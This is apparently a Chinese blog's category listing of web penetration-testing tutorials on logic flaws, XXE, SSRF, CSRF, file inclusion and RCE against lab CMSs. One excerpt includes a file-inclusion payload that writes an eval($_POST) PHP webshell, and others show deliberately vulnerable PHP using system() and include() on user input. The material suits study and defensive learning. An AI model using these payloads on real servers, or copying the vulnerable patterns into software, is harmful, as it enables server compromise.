![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web渗透
文章平均质量分 51
ihszg
四舍五入两米高,取整去余一百斤,平时找bug挖漏洞,闲时与学妹吟诗作赋,乏时以太极养精蓄锐。偶尔也为部分游戏的Beta测试出力。这就是我,展现在人前的我
展开
-
逻辑漏洞之无密码登录(vlcms)
目录漏洞原理演示逻辑图靶场cms下载漏洞原理无密码登录,说到这个,大家可能想到的是下面这几种方法。一种是用第三方账户,比如使用QQ登录,使用微博登录。一种就是邮箱登录,比如只要输入email地址,然后网站就会给你的邮箱发一条邮件,邮件里有条链接,你只要点击链接就能登录。还有就是扫码登录,比如手机QQ扫码登录电脑QQ。……但是这些并不是本文所介绍的,因为这些是正常的无密码登录。所谓无密码登录漏洞,我觉得应该是:原本需要输入账号、密码并验证其符合要求才能正常登录的地方,因为程序的不严谨,造成不输原创 2020-09-06 11:57:34 · 3862 阅读 · 3 评论 -
逻辑漏洞之密码找回漏洞(semcms)
目录什么是密码找回漏洞一般流程可能产生该漏洞的情况脑洞图1.用户凭证暴力破解2.返回凭证3.邮箱弱token4.用户凭证有效性5.重新绑定6.服务器验证7.用户身份验证8.找回步骤9.本地验证10.注入11.Token生成12.注册覆盖13.session覆盖演示暴破验证码找回密码更改id号修改admin密码靶场cms下载什么是密码找回漏洞利用漏洞修改他人帐号密码,甚至修改管理员的密码。一般流程1 首先尝试正常找回密码流程,选择不同的找回方式,记录所有数据包2 分析数据包,找到敏感部分3原创 2020-09-06 11:55:15 · 6395 阅读 · 7 评论 -
逻辑漏洞之越权、支付漏洞
目录逻辑漏洞Web安全渗透三大核心方向输入输出登录体系、权限认证业务逻辑漏洞分类1、登录体系安全暴力破解cookie安全加密测试登录验证绕过任意注册2、业务一致性安全手机号篡改邮箱和用户名更改订单ID更改商品编号更改用户ID篡改流程顺序3、业务数据篡改金额数据篡改商品数量篡改最大数限制突破金额&优惠组合修改4、密码找回漏洞分析数据包,定位敏感信息分析找回机制修改数据包验证任意密码找回5、验证码突破暴力破解时间、次数突破回显测试验证码绕过测试验证检验机制猜解6、会话权限安全未授权访问水平&垂直原创 2020-09-06 11:52:38 · 6599 阅读 · 4 评论 -
变量覆盖
extract()函数parse_str()函数import_request_variables()函数原创 2020-09-04 00:16:29 · 2828 阅读 · 1 评论 -
XXE注入漏洞
什么是XML要想清楚XXE漏洞,首先要了解XMLXML 可扩展标记语言(EXtensible Markup Language)。它是一门用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型。XML 很像HTML,但是标签没有被预定义,需要自行定义标签。它的文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它的设计宗旨是传输数据,而不是显示数据。php版本大于5.4.45的默认不解析外部实体传参实体:有%一般实体:无%xxe漏洞与ssrf漏洞相似虽然场景不同,原创 2020-09-03 19:15:51 · 3356 阅读 · 0 评论 -
任意文件包含漏洞(3)——实战xhcms
又是一个有漏洞的cms编码了127.0.0.1/xhcms/?r=<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>’);?>抓包改原创 2020-08-23 18:05:54 · 3698 阅读 · 10 评论 -
任意文件包含漏洞(2)
绕过方式windows系统windows系统,文件名最长256个字符wj.php<?php$file=@$_GET['123'];include($file.'.html');?>所以如果限制了文件类型,可以1.在文件后面加.info.php......................................................................................................................原创 2020-08-23 18:05:25 · 2818 阅读 · 12 评论 -
任意文件包含漏洞(1)
文件包含不是漏洞,任意文件包含才是漏洞分类LFI:local fileinclude 本地文件上传RFI:remote file include 远程文件上传原理危害包含的函数include() :执行错误时,给出一个警告信息,继续运行include_once() : 功能如上,一个文件只调用一次,如果重复调用一个文件,则require() : 如果require()执行有错误,函数会输出错误信息,并终止脚本运行require_once()include() 执行到该函数时才会原创 2020-08-23 18:04:56 · 3132 阅读 · 9 评论 -
解析漏洞——中间件
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。原创 2020-08-21 19:41:24 · 3835 阅读 · 10 评论 -
服务器端请求伪造——SSRF
SSRF(Server-Side Request Forgery:服务器端请求伪造)是由攻击者构造形成的由服务端发起请求的一个安全漏洞。一般情况下,SSRF的攻击是目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)常见的攻击协议:http:// 用来探测是否存在ssrfgopher:// 一个分布型的文件搜集获取网络协议,没有默认端口,在WWW出现之前,Gopher 是Internet上最主要的检索工具。dict:// 探测端原创 2020-08-21 18:12:43 · 4838 阅读 · 0 评论 -
跨站请求伪造——CSRF
csrf,不需要知道别人的cookies,伪装成别人xss,要先知道别人的cookies,伪装成别人原创 2020-08-18 22:32:23 · 2098 阅读 · 2 评论 -
RCE远程控制Windows服务器——以win10虚拟机为例
虽然大部分网站都是linux系统环境下搭的,但是大部分的个人电脑都是windows系统,所以这里以win10为例首先,审计一下网站代码,是否有system……之类的危险函数如下面这种(当然,正常网站一个php里有很多内容,不可能只有这么两行内容,要慢慢审计)res.php<?php$a=$_GET['a'];system($a);?>连接:192.168.177.134是对方ip,res.php是包含危险函数的文件报错没关系查看ip(‘a’ 不是乱取的,根据php原创 2020-08-15 17:54:58 · 2340 阅读 · 0 评论